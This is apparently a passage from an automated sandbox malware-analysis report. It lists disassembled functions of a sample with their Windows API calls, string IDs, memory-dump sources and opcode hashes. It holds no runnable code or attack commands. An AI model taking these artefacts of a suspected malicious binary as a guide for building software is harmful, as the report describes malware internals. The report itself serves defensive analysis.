                                                                                        • Opcode Fuzzy Hash: 642cbb757c798b464e218aa70decae5e6efc434086f495e8bbeb8dcdbabf2780
                                                                                        • Instruction Fuzzy Hash: 5D5113B86043019FD754DF18C580A1ABBF1BF99344F54886EE9859B3A1D339EC91CF4A
                                                                                        Function 0047258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 0047259E
                                                                                        • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 004725D4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: CrackInternet_memset
                                                                                        • String ID: |
                                                                                        • API String ID: 1413715105-2343686810
                                                                                        • Opcode ID: 57f61fd01a308bda18669db1d90637b579712718f35f37a6001f1c43c21cdce8
                                                                                        • Instruction ID: 4adfb47e446f893ace23fd506e663b8e952a67a31115c745ae406753cf5a670a
                                                                                        • Opcode Fuzzy Hash: 57f61fd01a308bda18669db1d90637b579712718f35f37a6001f1c43c21cdce8
                                                                                        • Instruction Fuzzy Hash: A5313871D00119ABCF11AFA1CC85EEEBFB8FF08344F10406AF918B6162DB756916DB65
                                                                                        Function 00486A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DestroyWindow.USER32(?,?,?,?), ref: 00486B17
                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00486B53
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$DestroyMove
                                                                                        • String ID: static
                                                                                        • API String ID: 2139405536-2160076837
                                                                                        • Opcode ID: 352ac0ade79c08b1e3711c999f417e7e9207a04fdee643833d7e2eb5d5c32766
                                                                                        • Instruction ID: c0acac3fdbca48a843832e92e86f2a53b54dc7fac4935119c3a772658612a1a1
                                                                                        • Opcode Fuzzy Hash: 352ac0ade79c08b1e3711c999f417e7e9207a04fdee643833d7e2eb5d5c32766
                                                                                        • Instruction Fuzzy Hash: B3318171100604AEDB10AF69CC41BFF73A9FF48754F11892EF9A5D7290DA34AC81CB68
                                                                                        Function 004628A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00462911
                                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0046294C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoItemMenu_memset
                                                                                        • String ID: 0
                                                                                        • API String ID: 2223754486-4108050209
                                                                                        • Opcode ID: 92f9e9f041086d142ac39036aa78b8e8b2e32160e262157300fe5ac97b1e7f6d
                                                                                        • Instruction ID: 2b4b8058b7b01795732b14ccdc08f7f24d6d082f06cc36c2997a609d376c2748
                                                                                        • Opcode Fuzzy Hash: 92f9e9f041086d142ac39036aa78b8e8b2e32160e262157300fe5ac97b1e7f6d
                                                                                        • Instruction Fuzzy Hash: BE31D871700705BBDB24DE48CE45BAFBBA4EF85350F14001AE881A6291E7B89948CB1B
                                                                                        Function 004866D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00486761
                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0048676C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: Combobox
                                                                                        • API String ID: 3850602802-2096851135
                                                                                        • Opcode ID: 2599c693f4df458194b2d20bee318bb9363e3503390fb5a9e170622b8a8df8eb
                                                                                        • Instruction ID: 7937b7f8ceb80f7c2640562fc72fb2af059ad44b1fd006181b112b31544ba688
                                                                                        • Opcode Fuzzy Hash: 2599c693f4df458194b2d20bee318bb9363e3503390fb5a9e170622b8a8df8eb
                                                                                        • Instruction Fuzzy Hash: 9111B271200208AFEF51AF54DC81EAF376AEB48368F21092AF91897390D6399C5197A8
                                                                                        Function 00486C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
                                                                                          • Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
                                                                                          • Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00486C71
                                                                                        • GetSysColor.USER32(00000012), ref: 00486C8B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                        • String ID: static
                                                                                        • API String ID: 1983116058-2160076837
                                                                                        • Opcode ID: 9c6eecc6bf7be964b917928501c6ce077e485374675d84249056efc255601d24
                                                                                        • Instruction ID: 619ac3c59cbe9074ca3f8c975c7c8c691f8bfa66afa20d6a6bf36cd90ef0372b
                                                                                        • Opcode Fuzzy Hash: 9c6eecc6bf7be964b917928501c6ce077e485374675d84249056efc255601d24
                                                                                        • Instruction Fuzzy Hash: DC212CB2510209AFDF04EFA8CC45EEE7BA8FB08315F114A29FD55D2250D639E851DB64
                                                                                        Function 00486920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetWindowTextLengthW.USER32(00000000), ref: 004869A2
                                                                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004869B1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: LengthMessageSendTextWindow
                                                                                        • String ID: edit
                                                                                        • API String ID: 2978978980-2167791130
                                                                                        • Opcode ID: dd0a91ca5e41458d40a7dd2483d9f0107040614a073402ee9870d4d63f33d5fa
                                                                                        • Instruction ID: c4dc0b7ee3ea423f7e1eb401844c401eee0777dcbcb5b463cc5485c74a1bef4f
                                                                                        • Opcode Fuzzy Hash: dd0a91ca5e41458d40a7dd2483d9f0107040614a073402ee9870d4d63f33d5fa
                                                                                        • Instruction Fuzzy Hash: A711B2B1100104ABEF506F68DC40EEF3769EB05378F614B29F964972E0C739DC919758
                                                                                        Function 004629AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00462A22
                                                                                        • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00462A41
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoItemMenu_memset
                                                                                        • String ID: 0
                                                                                        • API String ID: 2223754486-4108050209
                                                                                        • Opcode ID: 751c536b083c9adfecd4a8c2834bb49aa0f4764eac95f6b1a2dda81446ac4081
                                                                                        • Instruction ID: fa89ad59b694463807a05e008f151e0ce3f2ba89f6cc59c0a4ca2f54b8788f6f
                                                                                        • Opcode Fuzzy Hash: 751c536b083c9adfecd4a8c2834bb49aa0f4764eac95f6b1a2dda81446ac4081
                                                                                        • Instruction Fuzzy Hash: EA11B172A01915BACB30DA98DA44BDF73A8AB45304F044027E855B7290E7F8AD0AC79A
                                                                                        Function 004721D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0047222C
                                                                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00472255
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Internet$OpenOption
                                                                                        • String ID: <local>
                                                                                        • API String ID: 942729171-4266983199
                                                                                        • Opcode ID: 75e9458716a39df8dc3ccd06a53274ec1d022472b75fdff4666a046931244d06
                                                                                        • Instruction ID: 87a968fd796eb7ebd351e14a87864fbf4782faaabfad8c695b3487e96fec79d3
                                                                                        • Opcode Fuzzy Hash: 75e9458716a39df8dc3ccd06a53274ec1d022472b75fdff4666a046931244d06
                                                                                        • Instruction Fuzzy Hash: 2C113270101221BADB248F118D84EFBFBACFF0A351F10C66BF90892200D2B49881D6F9
                                                                                        Function 0041092D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00403C14,004C52F8,?,?,?), ref: 0041096E
                                                                                          • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                        • _wcscat.LIBCMT ref: 00444CB7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: FullNamePath_memmove_wcscat
                                                                                        • String ID: SL
                                                                                        • API String ID: 257928180-181245872
                                                                                        • Opcode ID: 51d74b1989755c53183aee132601f2e45a628d82cf1f90107cdd3f9f5a0d9d06
                                                                                        • Instruction ID: 43824745660c3988bd5ee8fabd2b32f2c8f8042702d18c831ff1fab54f9b3e1b
                                                                                        • Opcode Fuzzy Hash: 51d74b1989755c53183aee132601f2e45a628d82cf1f90107cdd3f9f5a0d9d06
                                                                                        • Instruction Fuzzy Hash: ED118274A15208AACB40EB648945FDD77B8AF08354B0044ABB948E7291EAB8B6C4471D
                                                                                        Function 00458E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                          • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                                                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00458E73
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClassMessageNameSend_memmove
                                                                                        • String ID: ComboBox$ListBox
                                                                                        • API String ID: 372448540-1403004172
                                                                                        • Opcode ID: 5f835d864d1f62cb0e419e0b79a000cfa6bcf93be05798d2294fd29a5aacd538
                                                                                        • Instruction ID: b8e2c670fbb7cccfe9550cd9997642be974785ccb83f9afd7f496d9e06e76b61
                                                                                        • Opcode Fuzzy Hash: 5f835d864d1f62cb0e419e0b79a000cfa6bcf93be05798d2294fd29a5aacd538
                                                                                        • Instruction Fuzzy Hash: 4001F971601118ABCF14FBA1CC429FE7368EF01320B100A2FBC25772D2DE39580CC655
                                                                                        Function 00468D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: __fread_nolock_memmove
                                                                                        • String ID: EA06
                                                                                        • API String ID: 1988441806-3962188686
                                                                                        • Opcode ID: 52e4c11e8ef934338f3706a5bab433cb38c03b7aa91e080fe40e6f8015fadc0b
                                                                                        • Instruction ID: 3cd15271acb3b06ac884f373c06a49f445b450121f82016c471601618c020999
                                                                                        • Opcode Fuzzy Hash: 52e4c11e8ef934338f3706a5bab433cb38c03b7aa91e080fe40e6f8015fadc0b
                                                                                        • Instruction Fuzzy Hash: 8F01F9719042287EDB18CAA9D816EFE7BFCDB11301F00459FF552D2181E878E6048764
                                                                                        Function 00458CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                          • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 00458D6B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClassMessageNameSend_memmove
                                                                                        • String ID: ComboBox$ListBox
                                                                                        • API String ID: 372448540-1403004172
                                                                                        • Opcode ID: cab40d2aaf23e91ff59439cc1de985c2b62d93c46401826af07ce28494d0c59f
                                                                                        • Instruction ID: f717951ca8db0a39ae808ededaa33f35f94e61068a96ac8ac9a889606be0a7e6
                                                                                        • Opcode Fuzzy Hash: cab40d2aaf23e91ff59439cc1de985c2b62d93c46401826af07ce28494d0c59f
                                                                                        • Instruction Fuzzy Hash: 1701B1B1A41108ABCF14EBA1C952AFF73A8DF15341F10042FB805772D2DE285E0CD67A
                                                                                        Function 00458D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                          • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                                                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 00458DEE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClassMessageNameSend_memmove
                                                                                        • String ID: ComboBox$ListBox
                                                                                        • API String ID: 372448540-1403004172
                                                                                        • Opcode ID: 50b9cba7b0b8ee41486070134dd84a018c343db3f4f48e35959f50274b6977a3
                                                                                        • Instruction ID: a21a4701c09283d063fe79b367182633aa51a9950eb7d0e2c1ab54a0e2954309
                                                                                        • Opcode Fuzzy Hash: 50b9cba7b0b8ee41486070134dd84a018c343db3f4f48e35959f50274b6977a3
                                                                                        • Instruction Fuzzy Hash: 36018FB1A41109ABDB11EAA5C942AFF77A8DF11301F20052FBC05732D3DE295E1DD67A
                                                                                        Function 0045C4EB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • VariantInit.OLEAUT32(?), ref: 0045C534
                                                                                          • Part of subcall function 0045C816: _memmove.LIBCMT ref: 0045C860
                                                                                          • Part of subcall function 0045C816: VariantInit.OLEAUT32(00000000), ref: 0045C882
                                                                                          • Part of subcall function 0045C816: VariantCopy.OLEAUT32(00000000,?), ref: 0045C88C
                                                                                        • VariantClear.OLEAUT32(?), ref: 0045C556
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$Init$ClearCopy_memmove
                                                                                        • String ID: d}K
                                                                                        • API String ID: 2932060187-3405784397
                                                                                        • Opcode ID: 9b1aca60acbf213d6da9471b2b02533c98583e4ee9509d3790eb0f545b09e1ee
                                                                                        • Instruction ID: 9b6b4eac42ae89553be157e2085c7612e92dc5081679660b2cee5bd476f3b436
                                                                                        • Opcode Fuzzy Hash: 9b1aca60acbf213d6da9471b2b02533c98583e4ee9509d3790eb0f545b09e1ee
